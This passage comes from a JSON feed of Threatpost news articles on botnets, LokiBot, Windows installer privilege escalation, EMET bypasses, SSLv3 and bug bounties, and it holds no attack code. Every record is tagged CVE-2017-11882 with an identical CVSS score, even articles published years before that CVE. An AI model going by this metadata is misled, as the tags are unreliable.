ZeroAccess\u2019s](<http://threatpost.com/microsoft-and-friends-take-down-zeroaccess-botnet/103122>) two million odd machines. Click-fraud is just one of the botnet\u2019s favorite pastimes. 
ZeroAccess, a/k/a Sirefef, has also been seen hijacking search results and redirecting victims to malicious, information stealing websites and for a short stint the platform was even spotted [facilitating Bitcoin mining](<http://threatpost.com/zeroaccess-botnet-cashing-click-fraud-and-bitcoin-mining-103012/77168>).\n\n[Microsoft greatly curbed](<http://threatpost.com/microsofts-curbs-click-fraud-in-zeroaccess-fight/100717>) the botnet\u2019s click-fraud tendencies in May 2013 after it added its signature to its Malicious Software Removal Tool (MSRT) and cleaned all the infected machines it could find of ZeroAccess.\n", "cvss3": {}, "published": "2015-01-29T14:25:48", "type": "threatpost", "title": "ZeroAccess Returns, Resumes Click-Fraud Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:27", "id": "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "href": "https://threatpost.com/zeroaccess-botnet-returns-resumes-click-fraud-activity/110736/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:58", "description": "There\u2019s an odd bit of behavior that some Windows systems will exhibit when certain kinds of installers are launched, automatically elevating the privileges of the installer process to system-level privileges. In theory, the issue shouldn\u2019t be exploitable because at one point in the process the system will generate an MD5 hash of a DLL that\u2019s to be loaded, and unless the attacker can replace that DLL with a malicious one that sports the same hash, an attack is impossible. But those constraints may not hold for all attackers, a researcher says.\n\nThe weirdness in Windows 7 and Windows Server 2008 was identified by Cesar Cerrudo of IOActive, and he spent some time looking into exactly what causes it and whether he\u2019d be able to exploit the condition. 
The issue arises when an installer for a program that is already installed on a given machine is executed. When one of those installers is run, it will automatically elevate the privileges of the current installer process to the System level. That would theoretically give an attacker a local elevation of privilege bug, granting him system privileges.\n\n\u201cHowever, an interesting issue arises during the installation process when running this kind of installer: a temporary file is created in `C:\\Users\\username\\AppData\\Local\\Temp`, which is the temporary folder for the current user. The created file is named `Hx????.tmp` (where `????` seem to be random hex numbers), and it seems to be a COM DLL from Microsoft Help Data Services Module, in which its original name is `HXDS.dll`. This DLL is later loaded by `msiexec.exe` process running under the System account that is launched by the Windows installer service during the installation process,\u201d [Cerrudo wrote in a blog post](<http://blog.ioactive.com/2012/01/free-windows-vulnerability-for-nsa.html?m=1>) explaining the issue.\n\n\u201cWhen the DLL file is loaded, the code in the DLL file runs as the System user with full privileges. At first sight this seems to be an elevation of privileges vulnerability since the folder where the DLL file is created is controlled by the current user, and the DLL is then loaded and run under the System account, meaning any user could run code as the System user by replacing the DLL file with a specially-crafted one before the DLL is loaded and executed.\u201d\n\nBut there\u2019s more to it than just that. In order to exploit the weakness, Cerrudo said that an attacker likely would need to create a malicious DLL with the same MD5 hash as the benign one and then replace the original one with the DLL containing the exploit code. 
The attack in this case would be against the MD5 algorithm itself, because the attacker would need to create a second message with the same hash as the known message. Known as a second preimage attack, it is practically out of reach for most individual attackers.\n\nHowever, Cerrudo says that it may well be possible for an organization such as an intelligence agency with massive amounts of compute power and resources to execute such an attack. MD5 is known to have a variety of weaknesses, including collision problems, and Microsoft itself stopped including it in its products seven years ago. Cerrudo said that while exploiting the issue he found via a second preimage attack is likely impractical for most attackers, there may be other vectors out there that could accomplish the same task.\n\n\u201cI think that there could be others. I dedicated some time to it, I did research and tried different ways to exploit the issue but this doesn\u2019t mean that I exhausted all possibilities. It\u2019s just a matter of dedicating some time and trying different options like combining this issue with others, abusing some Windows Installer functionality, timing and blocking issues, etc. These are the kind of things I would try if I had time. 
I wouldn\u2019t discard that someone can come up with an idea to exploit it,\u201d Cerrudo said via email.\n", "cvss3": {}, "published": "2012-01-18T15:20:13", "type": "threatpost", "title": "Elevating Privileges Via Windows Installers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:58", "id": "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "href": "https://threatpost.com/elevating-privileges-windows-installers-011812/76111/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:56", "description": "Microsoft is planning to disable support for the weak SSLv3 protocol in Internet Explorer at some undetermined point in the future, and also will remove support for it in the company\u2019s online services soon.\n\nThe security and utility of SSLv3 has been an issue for a long time, but it came into sharper focus earlier this month when researchers at Google released details of a [new attack known as POODLE](<http://threatpost.com/new-poodle-ssl-3-0-attack-exploits-protocol-fallback-issue/108844>) that enables an attacker to decrypt protected content under certain circumstances. If an attacker has control of a target\u2019s Internet connection and can force the victim to run some Javascript in her browser, then he can eventually decrypt the content of a session protected by SSLv3. To do so, the attacker needs to be able to force a connection using the outdated protocol, and that can be done by forcing a failed secure connection between a server and client, which will trigger the server to try and renegotiate the secure connection using a different protocol.\n\nSSLv3 is nearly 15 years old and experts have considered it to be a security risk for a long time and have recommended that site operators use newer alternatives such as TLS 1.2. 
But there are plenty of sites that still support SSLv3 and IE 6, an artifact of a browser, doesn\u2019t support any transport layer security protocols newer than SSLv3 by default. Microsoft officials said the company is planning to remove the ability for IE to fall back to SSLv3 and eventually will disable the protocol by default altogether.\n\n\u201cWe are committed to helping protect our customers and providing the best possible encryption to protect their data. To do this, we\u2019re working to disable fallback to SSL 3.0 in IE, and disable SSL 3.0 by default in IE, and across Microsoft online services, over the coming months,\u201d Tracey Pretorius of the MSRC said in a blog [post](<http://blogs.technet.com/b/msrc/archive/2014/10/29/security-advisory-3009008-released.aspx>).\n\n\u201cMillions of people and thousands of organizations around the world rely on our products and services every day, and while the number of systems that rely on SSL 3.0 exclusively is very small, we recognize that, particularly for enterprises, disabling the protocol may cause some impact. 
That\u2019s why we\u2019re taking a planned approach to this issue and providing customers with advance notice.\u201d\n\nMicrosoft also is providing a FixIt tool that allows users to disable SSLv3 support in any supported version of IE.\n", "cvss3": {}, "published": "2014-10-29T14:56:06", "type": "threatpost", "title": "Microsoft Plans to Disable SSLv3 in IE, All Online Services", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-05T15:10:14", "id": "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "href": "https://threatpost.com/microsoft-plans-to-disable-sslv3-in-ie-all-online-services/109087/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:26", "description": "When one Pennsylvanian man couldn\u2019t foot his bills, he opted to steal the identity of someone who could \u2013 one of the world\u2019s richest men, Microsoft co-founder and billionaire Paul Allen.\n\nAn AWOL soldier from Pittsburgh swiped Allen\u2019s Citibank credit card account information earlier this year to make a $658.81 payment on a loan from the Armed Forces Bank, according to an [Associated Press report](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n\nA criminal complaint unsealed Monday claims that after acquiring Allen\u2019s account information, the soldier, Brandon Lee Price, 28, changed the address of the card to his own and reported it missing in an attempt to have a new card sent to his Pittsburgh address. 
The card was delivered and soon after, the fraudulent charges began to pile up.\n\nOn top of the loan payment, it was also used at a Pittsburgh GameStop ($278.18), a Family Dollar ($1) and at a Western Union, where Price tried to process a $15,000 transaction.\n\nThe bank noticed the illicit charges and promptly notified the FBI, which had an agent follow Price around the neighborhood. After agents saw him wearing the same clothes he wore in surveillance footage taken at the GameStop and Family Dollar stores, Price was arrested on March 2.\n\nAccording to authorities, Price had actually been away from the army since June 2010 and was wanted as a deserter.\n\nAllen, who helped found Microsoft with Bill Gates in 1975, also owns the NBA\u2019s Portland Trailblazers and the NFL\u2019s Seattle Seahawks and has a net worth of about $14.2 billion, [according to Forbes](<http://www.forbes.com/profile/paul-allen/>) \u2013 enough to rank at number 48 on the [publication\u2019s list](<http://www.forbes.com/billionaires/#p_1_s_a0_All%20industries_All%20countries_All%20states_>) of the richest people on the planet.\n\nFor more on this, check out the AP report via the [Washington Post](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n", "cvss3": {}, "published": "2012-03-29T15:56:05", "type": "threatpost", "title": "Fortune Favors the Bold? Man Steals Microsoft Founder's Identity, Credit Card", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:32", "id": "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "href": "https://threatpost.com/fortune-favors-bold-man-steals-microsoft-founder-s-identity-credit-card-032912/76380/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-09T22:13:17", "description": "The U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) is warning that the LokiBot info-stealing trojan is seeing a surge across the enterprise landscape.\n\nThe uptick started in July, according to the agency, and activity has remained \u201cpersistent\u201d ever since.\n\nLokiBot targets Windows and [Android endpoints](<https://threatpost.com/lokibot-redux-common-android-apps/157458/>), and spreads mainly through email (but also via malicious websites, texts and messaging). It typically goes after credentials (usernames, passwords, cryptocurrency wallets and more), as well as personal information. The malware steals the data through the use of a keylogger to monitor browser and desktop activity, CISA explained.\n\n\u201cLokiBot has stolen credentials from multiple applications and data sources, including Windows operating system credentials, email clients, File Transfer Protocol and Secure File Transfer Protocol clients,\u201d according to the alert, [issued Tuesday](<https://us-cert.cisa.gov/ncas/alerts/aa20-266a>). \u201cLokiBot has [also] demonstrated the ability to steal credentials from\u2026Safari and Chromium and Mozilla Firefox-based web browsers.\u201d\n\nTo boot, LokiBot can also act as a backdoor into infected systems to pave the way for additional payloads.\n\nLike its Viking namesake, LokiBot is a bit of a trickster, and disguises itself in diverse attachment types, sometimes using steganography for maximum obfuscation. For instance, the malware has been disguised as a .ZIP attachment [hidden inside a .PNG file](<https://threatpost.com/lokibot-trojan-spotted-hitching-a-ride-inside-png-files/143491/>) that can slip past some email security gateways, or [hidden as an ISO disk image](<https://threatpost.com/malspam-emails-blanket-lokibot-nanocore-malware-with-iso-files/145991/>) file attachment.\n\nIt also uses a number of application guises. 
\u201cSince LokiBot was first reported in 2015, cyber actors have used it across a range of targeted applications,\u201d CISA noted. For instance, in February, it was seen [impersonating a launcher](<https://www.trendmicro.com/en_us/research/20/b/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file.html>) for the popular Fortnite video game.\n\nOther tactics include the use of zipped files along with malicious macros in Microsoft Word and Excel, and exploiting [CVE-2017-11882](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>) (an issue in Office Equation Editor that allows attackers to automatically run malicious code without requiring user interaction). The latter is done via malicious RTF files, researchers have observed.\n\nTo boot, researchers [have seen the malware being sold](<https://threatpost.com/u-s-manufacturer-most-recent-target-of-lokibot-malspam-campaign/148153/>) as a commodity in underground markets, with versions selling for as little as $300.\n\nWith all of these factors taken together, LokiBot represents \u201can attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases,\u201d according to CISA.\n\nSaryu Nayyar, CEO at Gurucul, noted that the advisory is another indication of how malware authors have turned their malicious activities into a scalable business model.\n\n\u201cThe fact that LokiBot has been around for over four years and has gained in capability over time is a reflection of how much malicious actors have advanced the state of their art, leveraging the same development models we use in the commercial space,\u201d she said, via email.\n\nTo protect themselves, CISA said that companies should keep patches up to date, disable file- and printer-sharing services if not necessary, enforce multi-factor authentication and strong passwords, enable personal firewalls and scanning of downloads, and implement user education on how to exercise caution 
when opening email attachments, even if the attachment is expected and the sender appears to be known.\n", "cvss3": {}, "published": "2020-09-23T15:27:18", "type": "threatpost", "title": "CISA: LokiBot Stealer Storms Into a Resurgence", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-09-23T15:27:18", "id": "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "href": "https://threatpost.com/cisa-lokibot-stealer-resurgence/159495/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:57:21", "description": "CANCUN \u2013 Bounty programs are mislabeled creatures, too often pigeonholed as a payoff for finding individual vulnerabilities in software.\n\nWrong.\n\n\u201cThe name bug bounty is actually a false categorization of what is truly just an incentive program,\u201d said Katie Moussouris, chief policy officer at HackerOne and architect of Microsoft\u2019s vulnerability coordination program, during her talk today at the Security Analyst Summit. \u201cYou are creating an incentive for whatever you want. It\u2019s not just individual bugs all the time.\u201d\n\nThat means organizations interested in nurturing their own programs should think about not only finding and fixing one-off bugs, but also focus on strategic goals such as eliminating entire classes of vulnerabilities and encouraging contributors to build mitigations. Architected correctly, vulnerability incentive programs can also feed an enterprise software development lifecycle and reduce the number of bugs that leak into production.\n\nAnd don\u2019t live under the illusion that you\u2019ll never have to contract a pen-tester again.\n\n\u201cThere\u2019s a time and place to get specialists under contract to look at things you don\u2019t want to open to the world; that\u2019s where a pen test comes in,\u201d Moussouris said. \u201cYou cannot replace pen-tests whole-heartedly. 
It\u2019s playing whack-a-bug if you\u2019re not feeding your bug bounty program results into your SDL.\u201d\n\nFor its part, Microsoft was standoffish about dipping into the bug bounty waters. And for good reason. As Moussouris explains it, for so long, researchers who wanted to find Windows or Internet Explorer bugs were only after credit in a Patch Tuesday security bulletin. Often, those were career boosters, she said. Even established third-party programs such as the Zero Day Initiative were contributing bugs to Microsoft gratis.\n\nBut as vulnerability brokers and companies such as VUPEN and ReVuln emerged, the market began to exert its pressures on Microsoft. Moussouris had to turn part politician inside the walls of Redmond and convince the powers that be to provide incentives to researchers to not give in to the six-figure seduction of the vulnerability market and renew relationships with white-hats.\n\nThe end result was a number of specialized bounties sponsored by Microsoft, including a $100,000 mitigation bypass bounty, the Blue Hat bonus for defense and a temporary Internet Explorer bounty.\n\nIn each case, there were carrots Microsoft was dangling in front of researchers that others in the market were not.\n\n\u201cAgain, this isn\u2019t a bounty, it\u2019s an incentive,\u201d Moussouris said.\n\nYet it still wasn\u2019t good enough, Moussouris said, remembering how she had to convince Microsoft to begin paying for bug submissions in IE 10 while that version of the browser was in beta. She treasures a chart that shows a huge spike in bug submissions once IE 10 was released to manufacturing, many of them critical vulnerabilities that would be fixed in security bulletins.\n\n\u201cThere were no incentives if Microsoft fixed a bug during beta; no bulletin, no credit, no incentives during that period,\u201d Moussouris said. 
\u201cWhat if we create an incentive beta program if there were no buyers in town?\u201d\n\nThe bounty program was extended into beta, giving only Microsoft first crack at bugs before they were out in the open market. And they were fixed on the cheap too. For the IE 10 in beta, there were 23 submissions, 18 of those would have been rated critical, including four sandbox escapes, Moussouris said. The payout: $28,000, an average payout of $1,100.\n\n\u201cIf you create an incentive at the right time, you will absolutely get the results you want,\u201d Moussouris said.\n", "cvss3": {}, "published": "2015-02-16T13:59:58", "type": "threatpost", "title": "Lessons Learned in Building a Vulnerability Coordination Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-16T20:06:46", "id": "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "href": "https://threatpost.com/dont-build-a-bounty-program-build-an-incentive-program/111103/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:29", "description": "Microsoft last week extended the end-of-life expiration date to July 2018 on its exploit mitigation add-on, the Enhanced Mitigation Experience Toolkit (EMET). But for some time, the once-useful tool has been well on its way out to pasture.\n\nWhile EMET was never meant to be anything more than stopgap protection against exploits, attackers and white-hat researchers accelerated its demise with a number of publicized [bypass attacks](<https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/>). That situation, plus Microsoft\u2019s urgency to have users migrate to Windows 10 and the array of new memory mitigations included in the latest OS has brought the curtain down on EMET.\n\n\u201cIt was a stopgap. 
It was never supposed to be something [Microsoft] wanted people to use longterm,\u201d said Cody Pierce, director of vulnerability research at Endgame. \u201cThey want people to upgrade Windows 10; for the good of their customers, they want to transition them to Windows 10 where there are some protections baked into the operating system.\u201d\n\nForemost is Control Flow Guard, a technology built to counter memory-corruption vulnerabilities, which has been available since Visual Studio 2015 and is also built into Windows 10 and Windows 8.1. [Control Flow Guard](<https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/>) is thought to be a primary impediment to [use-after-free attacks](<https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/>), which became a favorite exploit once ASLR and DEP put a damper in buffer overflow attacks.\n\n\u201cThere are a lot more compile time mitigations [in Windows 10] like Control Flow Guard, and a new Return Flow Guard feature,\u201d said Darren Kemp, security researcher with Duo Security. Kemp also pointed out that since Windows 10\u2019s mitigations are integrated into the operating system, unlike EMET, there are fewer instances where users will notice a performance hit, which was increasingly common with EMET. Also, EMET required close care when configuring it to work, otherwise it could break certain application processes.\n\n\u201cSince it\u2019s not integrated, you don\u2019t get the same type of tight coupling,\u201d Kemp said. \u201cWith a lot of stuff in EMET, you have to test the software you\u2019re applying it to, to make sure the mitigations don\u2019t cause problems. It hooks into functions and injects features. If software does non-standard things, it can cause problems with those apps.\u201d\n\nMicrosoft, meanwhile, has not had EMET on a consistent upgrade path since version 5.0 dropped in 2014. 
This was an abrupt change from the early days when EMET was introduced and exploits were unleashed within days of Patch Tuesday releases. In announcing the deadline extension to July 31, 2018, Microsoft\u2019s Jeffrey Sutherland acknowledged EMET\u2019s limitations against modern advanced attacks, its performance and reliability shortcomings, and urged users toward Windows 10, which makes the most of hardware virtualization to sandbox applications and links before they can harm the operating system.\n\n\u201cWith the types of threats enterprises face today, we are constantly reminded of this simple truth: modern defense against software vulnerabilities requires a modern platform,\u201d Sutherland said.\n\nThe true value of any mitigation continues to be how well it raises the cost of attacks. Pierce illustrated how advanced attackers have blown well past EMET\u2019s [menu of mitigations](<https://technet.microsoft.com/en-us/security/jj653751>) with advanced logic that automates many facets of an attack that its defenses cannot keep up with.\n\n\u201cIf you\u2019re an exploit kit writer and you acquire a zero day or develop an exploit, you have to get the most bang for your buck; and part of that is supporting a wide range of targets. If you\u2019ve got a Flash exploit, you want it to work on Firefox, Windows, Linux and more and you have to come up with ways to make it easier on you,\u201d Pierce said. \u201cA lot of the ways they\u2019ve figured out to do that bypasses a lot of these late-hook defenses like EMET. They\u2019re getting more value out of it. The types of exploit mitigations EMET provides were limited in utility due to the nature of exploitation. If you look at an exploit kit from 2010, it looks wildly different than it does now.\u201d\n\nDuo\u2019s Kemp, meanwhile, says Windows 10 is one of the hardest targets to breach today.\n\n\u201cThat\u2019s the nature of this stuff: raising the bar. 
If you\u2019re an attacker, do you want to invest a lot of time and energy to figure out a way around this, or are you going to go after something else?\u201d Kemp said.\n", "cvss3": {}, "published": "2016-11-07T13:50:00", "type": "threatpost", "title": "Microsoft Tears off the Band-Aid with EMET", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-11-15T14:12:29", "id": "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "href": "https://threatpost.com/microsoft-tears-off-the-band-aid-with-emet/121824/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "Microsoft will use its monthly patch to fix a critical security hole in versions of its Microsoft Office suite that could allow attackers to run malicious code on vulnerable systems. \n\nThe company [announced details of its upcoming monthly patch for November on Thursday](<http://www.microsoft.com/technet/security/bulletin/ms10-nov.mspx>). This month\u2019s patch also included bulletins regarding upcoming fixes for two other security vulnerabilities: another in the Microsoft Office suite that was rated \u201cimportant,\u201d and a third in the Forefront Unified Access Gateway that was also rated \u201cimportant.\u201d \n\nThe relatively meager group of three bulletins is a welcome change for IT administrators still trying to dig out from [October\u2019s monthly patch](<https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/>), which comprised 16 bulletins and fixes for 49 separate vulnerabilities. \n\nThe most serious vulnerability is rated \u201ccritical\u201d for Microsoft Office 2007, Service Pack 2 and for 32 and 64 bit editions of Office 2010. It is rated \u201cimportant\u201d for Office 2003, Service Pack 3, Office XP, Service Pack 3 and Office for Mac 2011. 
\n\nAccording to Microsoft\u2019s Bulletin [Severity Rating System](<http://www.microsoft.com/technet/security/bulletin/rating.mspx>), \u201ccritical\u201d vulnerabilities are described as those whose exploitation could allow the propagation of an Internet worm without user interaction, while \u201cimportant\u201d holes are those in which exploitation could result in the compromise of the confidentiality, integrity or availability of users\u2019 data or processing resources. \n\nA second Office vulnerability is rated \u201cimportant\u201d and affects PowerPoint 2002 Service Pack 3 and PowerPoint 2003 Service Pack 3. \n\nThe third bulletin affects Microsoft\u2019s Forefront Unified Access Gateway 2010 Updates 1 and 2 and is rated important. \n\nMicrosoft will release its monthly patch update on Tuesday November 9, 2010. \n", "cvss3": {}, "published": "2010-11-04T21:58:02", "type": "threatpost", "title": "Microsoft To Patch Critical Office Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:44", "id": "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "href": "https://threatpost.com/microsoft-patch-critical-office-flaw-110410/74642/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:18", "description": "SAN FRANCISCO\u2013The concept of threat modeling has evolved quite a lot in the last few years, moving from an activity that massive software companies such as Microsoft and Google use to anticipate and defend against potential threats to their products to something that many smaller organizations practice. 
Starting a threat modeling system can seem daunting, but the good news is that there\u2019s no one right way to do it, just the right way for a given organization.\n\nMicrosoft has been using some form of threat modeling internally for many years now and the company\u2019s security group has spent a lot of time speaking publicly about the benefits of the practice and advocating for wider adoption of it. [Adam Shostack](<https://threatpost.com/adam-shostack-science-security-and-value-thinking-differently-040709/72705>), a program manager in Microsoft\u2019s Trustworthy Computing group, has been one of the main proponents of threat modeling\u2019s use, and he said that he\u2019s reached the conclusion that threat modeling is not one defined set of methods or principles but a fluid and dynamic way of reducing security risks to products and services.\n\n\u201cI now think of threat modeling like Legos. There are things you can snap together and use what you need,\u201d he said during a talk at the RSA Conference here Wednesday. \u201cThere\u2019s no one way to threat model. The right way is the way that fixes good threats.\u201d\n\nSecurity experts often will tell developers that in order to build defensible and resilient products, they need to think like an attacker. That is, look at the product or system the way that a potential adversary would see it, find the weak spots that are ripe for exploitation and correct them. But Shostack said that isn\u2019t exactly the most useful advice.\n\n\u201cBeing told to think like an attacker is like being told to think like a professional chef,\u201d said Shostack, who recently published a new [book](<http://threatmodelingbook.com/>) on the topic, _Threat Modeling: Designing for Security_. 
\u201cA lot of security people like to cook, but if someone told you to go to the store and buy enough chickens for a restaurant that seats 78 people and turns over three times a night, you\u2019d have no idea what to do.\u201d\n\nAs with nearly everything in security these days, there are a number of methodologies, models, checklists and other aids designed to help organizations implement threat modeling. Those tools can be useful and have their places, Shostack said, but none of them should be seen as the perfect answer. Rather, use them as part of the process of putting building blocks in place as you construct a threat modeling program.\n\n\u201cWe want to focus on finding good threats. Use your assets and the actions of attackers to make threats real,\u201d he said. \u201cIt\u2019s hard to go from a checklist to a broader system. You have to think about threat modeling your software as an end-to-end process.\u201d\n\nOf course, even the best and most well-constructed threat modeling program still has to deal with the most unpredictable and dangerous threat to the product: the end user. Trying to predict how users will misuse, abuse and break a piece of software is a fool\u2019s errand, but Shostack said it\u2019s still up to the professionals to put their products in the best position to survive in today\u2019s environment.\n\n\u201cTo tell people that they can\u2019t use their computers for what they want is a battle we\u2019re going to lose over and over again,\u201d he said. \u201cPeople don\u2019t buy their computers to be secure. 
They buy them to watch dancing babies.\u201d\n", "cvss3": {}, "published": "2014-02-26T14:14:34", "type": "threatpost", "title": "Threat Modeling, Legos and Dancing Babies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-03T22:04:34", "id": "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "href": "https://threatpost.com/threat-modeling-legos-and-dancing-babies/104517/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:19", "description": "SAN FRANCISCO \u2014 Researchers at Bromium Labs are expected to announce today they have developed an exploit that bypasses all of the mitigations in Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET). Principal security researcher Jared DeMott is scheduled to deliver a presentation this morning at the Security BSides conference explaining how the company\u2019s researchers were able to bypass all of the memory protections offered within the free Windows toolkit.\n\nThe work is significant given that Microsoft has been quick to urge customers to install and run EMET as a [temporary mitigation against zero-day exploits](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) targeting memory vulnerabilities in Windows or Internet Explorer.\n\nEMET is not meant to be a permanent fix; instead, it is supposed to terminate or block actions by malware or exploits threatening previously unreported vulnerabilities until a patch is available.\n\nMicrosoft is expected to release the latest version of EMET this week during the RSA Conference; Rahul Kashyap, chief security architect at Bromium, said the company has been working closely with Microsoft and expects the vulnerability to be addressed in the new EMET release.\n\nEMET comes with a dozen different mitigations starting with Data Execution Prevention and Address Space Layout Randomization, two key memory 
protections in Windows, as well as a handful of mitigations against return-oriented programming (ROP), heap spray and SEHOP mitigations, and more.\n\nKashyap said Bromium\u2019s technique bypasses all of EMET\u2019s mitigations, unlike previous bypasses that were able to beat only certain aspects of the tool.\n\n\u201cWe analyzed all of the protections, and took an IE exploit and then we kept on tweaking the exploit payload until we were able to bypass all the mitigations available in EMET,\u201d Kashyap said. \u201cEverything is bypassed in its latest version.\u201d\n\nKashyap said EMET has raised the bar significantly for exploit writers trying to beat Windows\u2019 protections. Malware writers, such as those behind [Operation SnowMan targeting the latest IE zero-day](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), have taken to adding modules that scan computers for EMET libraries and will not execute if EMET is installed.\n\n\u201cEMET, like any other tool, needs to know exploitation vectors to be able to block them. We tried to attack that very core, fundamental architectural drawback that most tools today have, which is you need to detect an exploit in order to protect,\u201d Kashyap said. \u201cIn this case, we studied the mitigations available in EMET and then we tweaked a payload to create a new vector variant which could bypass the existing mitigations.\u201d\n\nIn a [paper](<http://labs.bromium.com/>) released today, DeMott explained that the researchers intended initially to target just the five ROP protections in EMET with a real-world browser exploit. The project grew to include all relevant protections including stack pivot protection, shellcode complete with an EAF bypass and more, DeMott wrote.\n\n\u201cThe impact of this study shows that technologies that operate on the same plane of execution as potentially malicious code, offer little lasting protection,\u201d DeMott wrote. 
\u201cThis is true of EMET and other similar userland protections.\u201d\n\nBromium said its research focused on 32-bit Windows 7 systems running EMET 4.0 and 4.1 (ROP protection is not implemented for 64-bit processes, the paper said.). ROP is an exploitation technique that evolved from ret2libc, which enables an attacker to inject and execute code by re-using code that already exists. The ROP technique changes executable permissions in memory space, DeMott explained in the paper, in order to execute the attacker\u2019s code located elsewhere. An attacker must chain together a series of processes in order for ROP to succeed.\n\nEMET has been bypassed numerous times before. Researcher [Aaron Portnoy](<http://thunkers.net/~deft/presentations/SummerCon%202013/Aaron_Portnoy-Bypassing_All_Of_The_Things.pptx>), cofounder of Exodus Intelligence, presented a paper during last year\u2019s SummerCon that explained a number of EMET bypasses. Two years ago, a researcher in Iran named Shahriyar Jalayeri reported [two bypasses of EMET\u2019s five ROP protections](<http://threatpost.com/researcher-finds-technique-bypass-microsofts-emet-protections-080912/76895>).\n\nYou can expect researchers to continue to try to poke holes in EMET. 
The upcoming Pwn2Own contest at the CanSecWest Conference is offering a $150,000 grand prize to anyone able to [bypass EMET running on Windows 8.1 and Internet Explorer 11](<http://threatpost.com/pwn2own-paying-150000-grand-prize-for-microsoft-emet-bypass/104015>).\n", "cvss3": {}, "published": "2014-02-24T08:43:50", "type": "threatpost", "title": "Complete Microsoft EMET Bypass Developed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-26T23:48:50", "id": "THREATPOST:37854AF8C9A75E43ACA98BD95205B6BC", "href": "https://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:22", "description": "Next week\u2019s Microsoft [Patch Tuesday security bulletins](<https://technet.microsoft.com/en-us/library/security/MS14-AUG>) will not only bring nine new security bulletins but also an update to Internet Explorer that blocks outdated ActiveX controls, starting with Java.\n\nNotifications will flag the older ActiveX controls and users will have the option to update the control immediately or run it for a particular instance. IT administrators will also have the option to configure the update to block older controls outright, and not just warn the user.\n\n\u201cBecause many ActiveX controls aren\u2019t automatically updated, they can become outdated as new versions are released,\u201d Microsoft said this week in its [announcement](<http://blogs.msdn.com/b/ie/archive/2014/08/06/internet-explorer-begins-blocking-out-of-date-activex-controls.aspx>). 
